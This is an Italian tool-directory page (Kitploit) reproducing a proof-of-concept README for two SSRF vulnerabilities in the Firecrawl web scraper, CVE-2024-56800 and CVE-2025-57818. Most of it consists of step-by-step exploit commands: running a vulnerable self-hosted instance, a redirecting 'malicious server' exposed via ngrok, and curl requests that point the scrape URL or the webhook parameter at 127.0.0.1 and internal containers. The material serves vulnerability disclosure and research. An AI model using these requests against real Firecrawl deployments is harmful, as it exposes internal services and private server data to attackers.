Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-56800-poc — Exploit proof-of-concept che dimostra vulnerabilità SSRF nello scraper web Firecrawl (CVE-2024-56800, CVE-2025-57818) con configurazione self-hosted e server di redirect malevolo. | Kitploit
Strumenti/GitHubGitHub/cyhe50/cve-2024-56800-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingCrawler
GitHubcyhe50/cve-2024-56800-poc

cve-2024-56800-poc

Exploit proof-of-concept che dimostra vulnerabilità SSRF nello scraper web Firecrawl (CVE-2024-56800, CVE-2025-57818) con configurazione self-hosted e server di redirect malevolo.

Vedi Repository
510 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cve-2024-56800 POC

Riferimento

https://nvd.nist.gov/vuln/detail/CVE-2024-56800

https://github.com/firecrawl/firecrawl/commit/4d1f92f4c8c36403022428285a03621fd90d62ec

https://github.com/firecrawl/firecrawl/security/advisories/GHSA-vjp8-2wgg-p734

Vulnerabilità

Firecrawl è uno scraper web che consente agli utenti di estrarre il contenuto di una pagina web. Le versioni precedenti alla 1.1.1 contengono una vulnerabilità di server-side request forgery (SSRF). Il motore di scraping accetta siti web che reindirizzano a qualsiasi indirizzo IP locale, provocando la fuga di risorse nel server privato.

si trova in apps/api/src/controllers/v1/scrape.ts

l'input dell'utente non è sanificato e può essere un indirizzo IP privato. Quando si utilizza 127.0.0.1, viene effettivamente reindirizzato alla rete locale di firecrawl, causando la perdita di informazioni dal server interno di firecrawl.

Come usare questo POC

1. scarica questo POC

root@kitploit:~
git clone https://github.com/cyhe50/cve-2024-56800-poc
cd cve-2024-56800-poc 

2. avvia un server firecrawl self-hosted

root@kitploit:~
cd scraper/firecrawl-1.0.0
docker-compose up -d
cd ../..

3. avvia un server malevolo

root@kitploit:~
cd malicious_server
docker build -t malicious_server .
docker run -p 8000:80 malicious_server

4. pubblica il server malevolo

Il motivo è che il server firecrawl blocca gli URL privati. Se non vuoi rendere il server pubblico, credo tu possa semplicemente commentare la validazione direttamente in firecrawl.

Qui scrivo solo quello che ho fatto. ngrok:

root@kitploit:~
ngrok http 8000

5. esegui lo scraper

curl: (ricordati di incollare l'url corretto)

root@kitploit:~
curl -X POST http://localhost:3002/v1/scrape \
      -H 'Content-Type: application/json' \
      -d '{
        "url": "https://xxxxx.ngrok-free.app",
        "formats": ["markdown", "html"]
      }'
Screenshot 2025-11-01 at 7 51 02 PM

scraper.py

root@kitploit:~
cd scraper

!! apri Dockerfile e cambia l'url con quello appena generato

root@kitploit:~
docker build -t scraper .
docker run scraper

output previsto

Come funziona il POC

Codice sorgente vulnerabile

All'avvio del server firecrawl self-hosted, vengono abilitati 5 servizi, uno dei quali è firecrawl-test-1 (vedi maggiori dettagli con docker ps). Poiché tutti questi 5 servizi sono impostati sulla stessa rete, possono connettersi tra loro usando il nome del contenitore a cui vogliono connettersi.

Es. (connettiti a firecrawl-test-1)

eseguendo curl direttamente sulla macchina locale:

root@kitploit:~
curl http://firecrawl-test-1:80
oppure
curl http://localhost:80

nessuno dei due dovrebbe funzionare perché non sono nella stessa rete di firecrawl-test-1

Tuttavia, accedendo da firecrawl-api-1:

root@kitploit:~
docker exec -it firecrawl-api-1 /bin/bash
curl http:firecrawl-test-1:80
oppure
curl http://localhost:80

questo dovrebbe restituire i dati corretti perché sono nella stessa rete.

Nel server malevolo, viene reindirizzato a http://firecrawl-test-1:80, che dovrebbe funzionare solo per la rete di firecrawl. Pertanto, il successo nel raggiungere il server firecrawl-test-1 significa che lo scraper ha reindirizzato correttamente al suo server interno. Questo mostra come l'SSRF funziona per esporre risorse nel server privato.

CVE-2025-57818

Anche questa è una vulnerabilità SSRF. Si verifica nell'API di crawling dove il parametro webhook non è sanificato, gli attaccanti possono inviare richieste POST a una rete locale di firecrawl.

si trova in apps/api/src/services/webhook.ts. Il problema è che l'input webhookUrl non è sanificato

Il webhook invierà una richiesta POST all'URL specificato. Qui lo impostiamo su 127.0.0.1 e si è connesso con successo al server interno

root@kitploit:~
curl -X POST http://localhost:3002/v1/crawl \
     -H 'Content-Type: application/json' \
     -d '{
       "url": "https://example.com",
       "webhook": "http://127.0.0.1:80"
     }'

Il server interno ha ricevuto con successo la richiesta POST Screenshot 2025-11-01 at 7 56 53 PM

Scarica lo strumento